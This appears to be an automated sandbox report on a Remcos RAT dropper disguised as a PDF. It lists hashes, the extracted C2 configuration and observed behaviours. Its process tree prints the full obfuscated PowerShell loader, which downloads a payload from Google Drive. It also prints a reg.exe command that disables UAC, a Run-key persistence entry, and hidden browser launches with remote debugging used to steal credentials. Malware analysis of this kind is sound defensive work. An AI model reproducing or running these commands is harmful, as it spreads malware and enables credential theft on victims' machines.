Analysis

  • max time kernel
    149s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-11-2024 03:01

General

  • Target

    202411_257658·pdf.vbs

  • Size

    16KB

  • MD5

    8fae2dd7ad6f5216e37266fa35a2e6c2

  • SHA1

    a7fe9d4ee1d837f7092060ba6f17d99747f8a695

  • SHA256

    8ad7d114db6254a352121ff777a4ddd8da8942d905967271a9dbbc45a027bdcb

  • SHA512

    a66aeda15f3ffdeb6b5c8550c6ea83478a422377565ee46d61ead44a6b0bcd6fa03e624b39753214baca150e2e0fdb6f44af091b9bbe5a276f76409c3b724981

  • SSDEEP

    384:HUViroQ8TyG/RgtLF6p3ezAgYJcaIWkPF:CikzgLeezAguca+

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

5nd42h78s.duckdns.org:3782

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-J5NDOL

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • UAC bypass 3 TTPs 1 IoCs
  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 13 IoCs
  • Uses browser remote debugging 2 TTPs 9 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 19 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\202411_257658·pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2588
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Clavichordists='Rygeannoncernes';;$Tunfiske='winglet';;$Samsendende='Ureteralgia37';;$Interosculantnformationsstrmmers='Begunstiges';;$hydrophiloid='Forelgge';;$Banjoists=$host.Name;function Fetoplacental($Udslusnings){If ($Banjoists) {$Possibilism=4} for ($Interosculant=$Possibilism;;$Interosculant+=5){if(!$Udslusnings[$Interosculant]) { break }$Translatrernes+=$Udslusnings[$Interosculant]}$Translatrernes}function Galvanocautery($Rejsemaalet){ .($Ornamenterede) ($Rejsemaalet)}$Finansierendes=Fetoplacental 'HjrenObduE Ir t Sam. SolWPyreESte.bBetocDiesLApadiPj.dEHex,N OrgT';$Francize=Fetoplacental ' leM Ma o,gehzSka.iOverlBut lBanta nds/';$Urbacity=Fetoplacental 'tidsTCastlUnmasH,no1Du k2';$Frivrdier='Unm [staanNordematttT rn.TanksbladeHaspr GesVtarsi Bu C,ediEPla p pleoT,lfiVictnthertHul mKorsa OphNTappAOpkaGOmphE stjREnt ]So.g:Slop:AbdusSammeviatcPengUSupeRKontISk,dTBittyAllop arer ResoSpi tDisro ounCMusioBrutlafst=.der$M ttU C lrLyssbTushaAb,cCTr eiSestTYe.ry';$Francize+=Fetoplacental 'Dren5 ugb.Alpe0Tutm Wais(IndvWUndeiJer.n onsd E to rotw Pa sMeta MaalNSeveTMaal Efte1 Eli0 Ina.Indv0ka h;Pins BalW OutiF rsnP of6Trac4Flu,;.rac Gipsx Che6Arka4S rm;.dst Ove.rB usvSpik:Vanr1Mund3Alse1 ina.ned,0 M.o) il TastGSemie LukcnonskSpato .er/ Byl2 F,s0Copy1soir0 Bri0tend1 afh0Finl1Vold PostFD.lciValbrIntee .erfSubsoFir xBe s/Nipp1Nota3Dagr1Mine.fdse0';$Luxemburgskes=Fetoplacental 'G unU CorS,acielychr,ons- hidAGa,lgFiskeIndtNCubaT';$Porches=Fetoplacental 'Paagh S itCo ot ColpbatasCorn:Gabb/Ma a/vedldMystrAnneiSokkvS oueImpo.In,ugCh,roGaffoKinegBilllHenveInco. ndc MrkoA elmgamo/ Be u RaicH.of?Hys e Sk x Ampp,picoDemor BattInfr=Accid.isaoSmigwMindnco dlI.dkoPameaMemod Uni&AlfaiNo rd.ejl=Offs1 aciWBrsf7SlavSProneRe.i_RaptLMusiMSiraoMikr8Be loIncoHAnatuElec5IsleZMatsESubsqPatrpHypo7Spor6Nonp7NonsUIndkGLeg fUn i9Un,rqUdpa4UnslEs,ruF Tab0KursUPrinNEngau';$Piletaster=Fetoplacental 'Walt>';$Ornamenterede=Fetoplacental 'UagtIRenoe R nX';$Carnalized='Bestilleres';$Oxalemia='\Rudeknusers.Tow';Galvanocautery (Fetoplacental 'Comp$ TykGMesil LibO ishBGru.AAvallPaym:UopsfEucoJ ,haeKlumr A,rN eprSCellTK.apyEnd R eogIBadlNMe.tG enfe Stiras rNPonteAnimS Sup=Skld$LimneKnstN ,ybvTopp:DobiaCoenPDialpVestD,ncyaKl.mTEle ATo,n+A.tr$enr.oSmudXAntiARefeLUdb eMaalm du ICa,nA');Galvanocautery (Fetoplacental 'Prot$ Kong,aptlBurnO,ernBBal AComoLDrm : lrdHClo OSkanmEffeO iarGHensO JylnKlamO Ch,utva,S An = Hoo$FlesPDi.hOTak rTidyCSeriH EdiEFerisHalc.L ndSBurlPFordlBi liAff tOmta(Unha$SjldP arsiCyulLOs.uECyc t M dA epis RhaT I,dEOdumrFor )');Galvanocautery (Fetoplacental $Frivrdier);$Porches=$Homogonous[0];$Slumlike=(Fetoplacental ' Gl $Ud iGCentlUdhuOlandbYnglASkalLDeli:MarkmLgeso onr raG HarA efinPlasiJambc Hel=ImmeN E.hetastwfors-lighOInteBEx.rj L reSyk cDrjhtBekn fslSUnasyMighsBleaT proePseum Ren.,ver$ uprfOve.I,aseNOwnsASquanBil SLolliPortE Al.r neuEPessnK,nadKingECanoS');Galvanocautery ($Slumlike);Galvanocautery (Fetoplacental 'Koh.$ SupM Byso pfyr,eltgCamea SmanSu ti Ve cHugu.BuskHSorbe uraGibbdLofte var,aecsT,mo[guai$DisaLStrauOps,xPhone,ndem stab EftuKlanrslo gUa,ssSektkHotsePhansFuel]K ri= ens$ ConF R,dr GodaSwa,n entcS ndiGramz F.ee');$Inficeringer=Fetoplacental 'Sp d$FireM.ondoAfstrNon gCimbaCan,n.ilsiemphck ep. PreD .eboDourw mirn avolNedpoSpheaMealdDhunFUndeiindvlRedee olk( A.s$fornPBaktoAabnrTra,cB ugh poseVanrsS ac,Surp$SewnS.arbtU.clo L ncVie kU.nujSu euTreddLikvg ToniAnmen Hvsg ,el)';$Stockjudging=$Fjernstyringernes;Galvanocautery (Fetoplacental ' Ozo$Catog ForlSum.oSkarbLu gaUvirL .vo:unwaSPremUTilbBVildNSt seMisjtGildsFors= San(mytetF opeToxosS lktKass-St mPTabaALsefTGlanH gif Fler$ZandS tattSurtOBesmc T,ekThaijTmreu,anaDLednGSpisIOv rN H mgHenl)');while (!$Subnets) {Galvanocautery (Fetoplacental 'Lrr $DisogunatlO.peosparbneonaDi,glPatr: MidTK rsr Faue Ba d KolebesecTorliReaklNontlBetri Uroo ngn Unss Com=Ln.d$C.rtWTeguaIn ol StaiCa.ad') ;Galvanocautery $Inficeringer;Galvanocautery (Fetoplacental ' C,rsUnt tBladA araRmisit Slu-Uvavs A cL poE nfE S ipGazo ien4');Galvanocautery (Fetoplacental ' Tyk$BygrgHoo LN nnotjelbeleuA KomLStan:SplesA oruAutobCaskn ,ege AnsTIntesHors=Hatt(Tilgt.osieGiansBlo.T sek- DempCheraCuruT K lH tra Sild$Di dsU.peTResuOUnbecSardKkirsjReweuCoendG.spg Sy I.oulNPe,igForb)') ;Galvanocautery (Fetoplacental ' Spa$Bo tGO,relS,rio BloBzooga ,ubLSvin: IndNBouro,addN nurI PunNIndlTSpi eStarrTilsvS ndeChamnS.rotL.boi SkrOT.lsNDriviCircS raktSkil=P il$RistG,negl Vd o kaabI olap inl ,mn:Ka daUndemBeviYGeo OIntesBinyTKr.ohPlu,ePolyNAfbaIForsC,mid+Mel.+Unde%Cor.$UdomH U,eOOverMEnduOTrokGSumpoIssinUbi,OEnkeUBrngS Re,.YohiCT,lloDiblULagenNonct') ;$Porches=$Homogonous[$Noninterventionist]}$Unsavable=324784;$Staveformer7=30867;Galvanocautery (Fetoplacental 'Perf$ ve.GHy,rLSireO S,nB hanATabelu fa: ishSTranvAettI PikDPolaNScapiCamenCri gC,kesTant N me=.ilb MurmGsideeSme.tO,er- ioxcBalaO.enrNK sht CurE.allnMotoTSkot Haa$ KejsMi tt ioo Cu,cK.nskSpinjMorduTindDUd,nGCha I.ften NeoG');Galvanocautery (Fetoplacental 'Kult$ MrkgGishlNonco Beab KoraNon lAcop: vinC ,aosTr iiConuuUds makti La t=Dial Vik[KnitS AroyP onsIse,tTweaeMonkmSpir. LejCfos.o nfanHomovslageAccur.isttBekl] are:ove :OppoFUdsprRejsoFrafm Fa Bcalia Smis Depefrag6Sup 4KemoSlarytBombrTe,niSautnR grgMind(Peri$ An,STampv Le iSyn d eksnP nii,ndenEtplgNectsU in)');Galvanocautery (Fetoplacental 'Huse$Na jgKol.L GoroYderBJeanaslu.lNien:NorsZdirlO quaNVgtfE Ba LPleue B at Con forf= Und Graf[ mboSDe eySpr.s MemtStole FelM ap.dermtSyndEUdgaX.uksT Ulc. FlueIndbNTujaC acoo rh D SkriMosqnPiscG Cy,]panl:Coxc:J leaBestsL wlC emeiBlowIBist.Cap,GSnorESkilt,anssPhott Re.RasylITartN Aang ,fg(Iouf$ForfCP,acSRe kiInteuHypoM Til)');Galvanocautery (Fetoplacental 'tr n$Zorig ForLSubso adsbStakaStavL Eft: Al,A ObjTRapftUnirAIn.fRVideg B iUVergLClee=B.bl$LatiZSta o SidNSlavER tiL orbeAuriTMaan. aneSOleaUAftebF,nosJuncTU agrSna IMeg.nRespgCy n( Ek $MudsUHov NLgevS Gena LysVMaalA atib UndLmadreOm,k,perf$ M ssPeisT SenaSydaV SimE knnf G aoUnaiRGtesMLoxeEKormRDand7 Te )');Galvanocautery $Attargul;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5104
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Clavichordists='Rygeannoncernes';;$Tunfiske='winglet';;$Samsendende='Ureteralgia37';;$Interosculantnformationsstrmmers='Begunstiges';;$hydrophiloid='Forelgge';;$Banjoists=$host.Name;function Fetoplacental($Udslusnings){If ($Banjoists) {$Possibilism=4} for ($Interosculant=$Possibilism;;$Interosculant+=5){if(!$Udslusnings[$Interosculant]) { break }$Translatrernes+=$Udslusnings[$Interosculant]}$Translatrernes}function Galvanocautery($Rejsemaalet){ .($Ornamenterede) ($Rejsemaalet)}$Finansierendes=Fetoplacental 'HjrenObduE Ir t Sam. SolWPyreESte.bBetocDiesLApadiPj.dEHex,N OrgT';$Francize=Fetoplacental ' leM Ma o,gehzSka.iOverlBut lBanta nds/';$Urbacity=Fetoplacental 'tidsTCastlUnmasH,no1Du k2';$Frivrdier='Unm [staanNordematttT rn.TanksbladeHaspr GesVtarsi Bu C,ediEPla p pleoT,lfiVictnthertHul mKorsa OphNTappAOpkaGOmphE stjREnt ]So.g:Slop:AbdusSammeviatcPengUSupeRKontISk,dTBittyAllop arer ResoSpi tDisro ounCMusioBrutlafst=.der$M ttU C lrLyssbTushaAb,cCTr eiSestTYe.ry';$Francize+=Fetoplacental 'Dren5 ugb.Alpe0Tutm Wais(IndvWUndeiJer.n onsd E to rotw Pa sMeta MaalNSeveTMaal Efte1 Eli0 Ina.Indv0ka h;Pins BalW OutiF rsnP of6Trac4Flu,;.rac Gipsx Che6Arka4S rm;.dst Ove.rB usvSpik:Vanr1Mund3Alse1 ina.ned,0 M.o) il TastGSemie LukcnonskSpato .er/ Byl2 F,s0Copy1soir0 Bri0tend1 afh0Finl1Vold PostFD.lciValbrIntee .erfSubsoFir xBe s/Nipp1Nota3Dagr1Mine.fdse0';$Luxemburgskes=Fetoplacental 'G unU CorS,acielychr,ons- hidAGa,lgFiskeIndtNCubaT';$Porches=Fetoplacental 'Paagh S itCo ot ColpbatasCorn:Gabb/Ma a/vedldMystrAnneiSokkvS oueImpo.In,ugCh,roGaffoKinegBilllHenveInco. ndc MrkoA elmgamo/ Be u RaicH.of?Hys e Sk x Ampp,picoDemor BattInfr=Accid.isaoSmigwMindnco dlI.dkoPameaMemod Uni&AlfaiNo rd.ejl=Offs1 aciWBrsf7SlavSProneRe.i_RaptLMusiMSiraoMikr8Be loIncoHAnatuElec5IsleZMatsESubsqPatrpHypo7Spor6Nonp7NonsUIndkGLeg fUn i9Un,rqUdpa4UnslEs,ruF Tab0KursUPrinNEngau';$Piletaster=Fetoplacental 'Walt>';$Ornamenterede=Fetoplacental 'UagtIRenoe R nX';$Carnalized='Bestilleres';$Oxalemia='\Rudeknusers.Tow';Galvanocautery (Fetoplacental 'Comp$ TykGMesil LibO ishBGru.AAvallPaym:UopsfEucoJ ,haeKlumr A,rN eprSCellTK.apyEnd R eogIBadlNMe.tG enfe Stiras rNPonteAnimS Sup=Skld$LimneKnstN ,ybvTopp:DobiaCoenPDialpVestD,ncyaKl.mTEle ATo,n+A.tr$enr.oSmudXAntiARefeLUdb eMaalm du ICa,nA');Galvanocautery (Fetoplacental 'Prot$ Kong,aptlBurnO,ernBBal AComoLDrm : lrdHClo OSkanmEffeO iarGHensO JylnKlamO Ch,utva,S An = Hoo$FlesPDi.hOTak rTidyCSeriH EdiEFerisHalc.L ndSBurlPFordlBi liAff tOmta(Unha$SjldP arsiCyulLOs.uECyc t M dA epis RhaT I,dEOdumrFor )');Galvanocautery (Fetoplacental $Frivrdier);$Porches=$Homogonous[0];$Slumlike=(Fetoplacental ' Gl $Ud iGCentlUdhuOlandbYnglASkalLDeli:MarkmLgeso onr raG HarA efinPlasiJambc Hel=ImmeN E.hetastwfors-lighOInteBEx.rj L reSyk cDrjhtBekn fslSUnasyMighsBleaT proePseum Ren.,ver$ uprfOve.I,aseNOwnsASquanBil SLolliPortE Al.r neuEPessnK,nadKingECanoS');Galvanocautery ($Slumlike);Galvanocautery (Fetoplacental 'Koh.$ SupM Byso pfyr,eltgCamea SmanSu ti Ve cHugu.BuskHSorbe uraGibbdLofte var,aecsT,mo[guai$DisaLStrauOps,xPhone,ndem stab EftuKlanrslo gUa,ssSektkHotsePhansFuel]K ri= ens$ ConF R,dr GodaSwa,n entcS ndiGramz F.ee');$Inficeringer=Fetoplacental 'Sp d$FireM.ondoAfstrNon gCimbaCan,n.ilsiemphck ep. PreD .eboDourw mirn avolNedpoSpheaMealdDhunFUndeiindvlRedee olk( A.s$fornPBaktoAabnrTra,cB ugh poseVanrsS ac,Surp$SewnS.arbtU.clo L ncVie kU.nujSu euTreddLikvg ToniAnmen Hvsg ,el)';$Stockjudging=$Fjernstyringernes;Galvanocautery (Fetoplacental ' Ozo$Catog ForlSum.oSkarbLu gaUvirL .vo:unwaSPremUTilbBVildNSt seMisjtGildsFors= San(mytetF opeToxosS lktKass-St mPTabaALsefTGlanH gif Fler$ZandS tattSurtOBesmc T,ekThaijTmreu,anaDLednGSpisIOv rN H mgHenl)');while (!$Subnets) {Galvanocautery (Fetoplacental 'Lrr $DisogunatlO.peosparbneonaDi,glPatr: MidTK rsr Faue Ba d KolebesecTorliReaklNontlBetri Uroo ngn Unss Com=Ln.d$C.rtWTeguaIn ol StaiCa.ad') ;Galvanocautery $Inficeringer;Galvanocautery (Fetoplacental ' C,rsUnt tBladA araRmisit Slu-Uvavs A cL poE nfE S ipGazo ien4');Galvanocautery (Fetoplacental ' Tyk$BygrgHoo LN nnotjelbeleuA KomLStan:SplesA oruAutobCaskn ,ege AnsTIntesHors=Hatt(Tilgt.osieGiansBlo.T sek- DempCheraCuruT K lH tra Sild$Di dsU.peTResuOUnbecSardKkirsjReweuCoendG.spg Sy I.oulNPe,igForb)') ;Galvanocautery (Fetoplacental ' Spa$Bo tGO,relS,rio BloBzooga ,ubLSvin: IndNBouro,addN nurI PunNIndlTSpi eStarrTilsvS ndeChamnS.rotL.boi SkrOT.lsNDriviCircS raktSkil=P il$RistG,negl Vd o kaabI olap inl ,mn:Ka daUndemBeviYGeo OIntesBinyTKr.ohPlu,ePolyNAfbaIForsC,mid+Mel.+Unde%Cor.$UdomH U,eOOverMEnduOTrokGSumpoIssinUbi,OEnkeUBrngS Re,.YohiCT,lloDiblULagenNonct') ;$Porches=$Homogonous[$Noninterventionist]}$Unsavable=324784;$Staveformer7=30867;Galvanocautery (Fetoplacental 'Perf$ ve.GHy,rLSireO S,nB hanATabelu fa: ishSTranvAettI PikDPolaNScapiCamenCri gC,kesTant N me=.ilb MurmGsideeSme.tO,er- ioxcBalaO.enrNK sht CurE.allnMotoTSkot Haa$ KejsMi tt ioo Cu,cK.nskSpinjMorduTindDUd,nGCha I.ften NeoG');Galvanocautery (Fetoplacental 'Kult$ MrkgGishlNonco Beab KoraNon lAcop: vinC ,aosTr iiConuuUds makti La t=Dial Vik[KnitS AroyP onsIse,tTweaeMonkmSpir. LejCfos.o nfanHomovslageAccur.isttBekl] are:ove :OppoFUdsprRejsoFrafm Fa Bcalia Smis Depefrag6Sup 4KemoSlarytBombrTe,niSautnR grgMind(Peri$ An,STampv Le iSyn d eksnP nii,ndenEtplgNectsU in)');Galvanocautery (Fetoplacental 'Huse$Na jgKol.L GoroYderBJeanaslu.lNien:NorsZdirlO quaNVgtfE Ba LPleue B at Con forf= Und Graf[ mboSDe eySpr.s MemtStole FelM ap.dermtSyndEUdgaX.uksT Ulc. FlueIndbNTujaC acoo rh D SkriMosqnPiscG Cy,]panl:Coxc:J leaBestsL wlC emeiBlowIBist.Cap,GSnorESkilt,anssPhott Re.RasylITartN Aang ,fg(Iouf$ForfCP,acSRe kiInteuHypoM Til)');Galvanocautery (Fetoplacental 'tr n$Zorig ForLSubso adsbStakaStavL Eft: Al,A ObjTRapftUnirAIn.fRVideg B iUVergLClee=B.bl$LatiZSta o SidNSlavER tiL orbeAuriTMaan. aneSOleaUAftebF,nosJuncTU agrSna IMeg.nRespgCy n( Ek $MudsUHov NLgevS Gena LysVMaalA atib UndLmadreOm,k,perf$ M ssPeisT SenaSydaV SimE knnf G aoUnaiRGtesMLoxeEKormRDand7 Te )');Galvanocautery $Attargul;"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3432
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:468
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Perspektivet" /t REG_EXPAND_SZ /d "%Suitly% -windowstyle 1 $Packboard=(gp -Path 'HKCU:\Software\undisclosed\').Itabirite;%Suitly% ($Packboard)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:540
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Perspektivet" /t REG_EXPAND_SZ /d "%Suitly% -windowstyle 1 $Packboard=(gp -Path 'HKCU:\Software\undisclosed\').Itabirite;%Suitly% ($Packboard)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:4712
      • C:\Windows\SysWOW64\cmd.exe
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4276
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          4⤵
          • UAC bypass
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:1412
      • C:\Program Files\Google\Chrome\Application\Chrome.exe
        --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
        3⤵
        • Uses browser remote debugging
        • Enumerates system info in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:5076
        • C:\Program Files\Google\Chrome\Application\Chrome.exe
          "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffec1ebcc40,0x7ffec1ebcc4c,0x7ffec1ebcc58
          4⤵
            PID:5036
          • C:\Program Files\Google\Chrome\Application\Chrome.exe
            "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1920,i,14036714057203567232,17802402951555786940,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1916 /prefetch:2
            4⤵
              PID:3708
            • C:\Program Files\Google\Chrome\Application\Chrome.exe
              "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2092,i,14036714057203567232,17802402951555786940,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2116 /prefetch:3
              4⤵
                PID:2448
              • C:\Program Files\Google\Chrome\Application\Chrome.exe
                "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2184,i,14036714057203567232,17802402951555786940,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2300 /prefetch:8
                4⤵
                  PID:2136
                • C:\Program Files\Google\Chrome\Application\Chrome.exe
                  "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3180,i,14036714057203567232,17802402951555786940,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3208 /prefetch:1
                  4⤵
                  • Uses browser remote debugging
                  PID:4052
                • C:\Program Files\Google\Chrome\Application\Chrome.exe
                  "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3200,i,14036714057203567232,17802402951555786940,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3240 /prefetch:1
                  4⤵
                  • Uses browser remote debugging
                  PID:4836
                • C:\Program Files\Google\Chrome\Application\Chrome.exe
                  "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4584,i,14036714057203567232,17802402951555786940,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4604 /prefetch:1
                  4⤵
                  • Uses browser remote debugging
                  PID:3820
              • C:\Windows\SysWOW64\msiexec.exe
                C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\ieczsovpjdhsfmfkey"
                3⤵
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:1752
              • C:\Windows\SysWOW64\msiexec.exe
                C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\lyhrtgnixlzfhtbovjpmu"
                3⤵
                • Accesses Microsoft Outlook accounts
                • System Location Discovery: System Language Discovery
                PID:2700
              • C:\Windows\SysWOW64\msiexec.exe
                C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\vancurykltrkrhpaetcnfuuq"
                3⤵
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2088
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
                3⤵
                • Uses browser remote debugging
                • Enumerates system info in registry
                • Modifies registry class
                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                • Suspicious use of FindShellTrayWindow
                PID:2088
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffec1d746f8,0x7ffec1d74708,0x7ffec1d74718
                  4⤵
                    PID:3468
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,9096847165925291247,12480495912472824627,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2
                    4⤵
                      PID:3636
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,9096847165925291247,12480495912472824627,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:3
                      4⤵
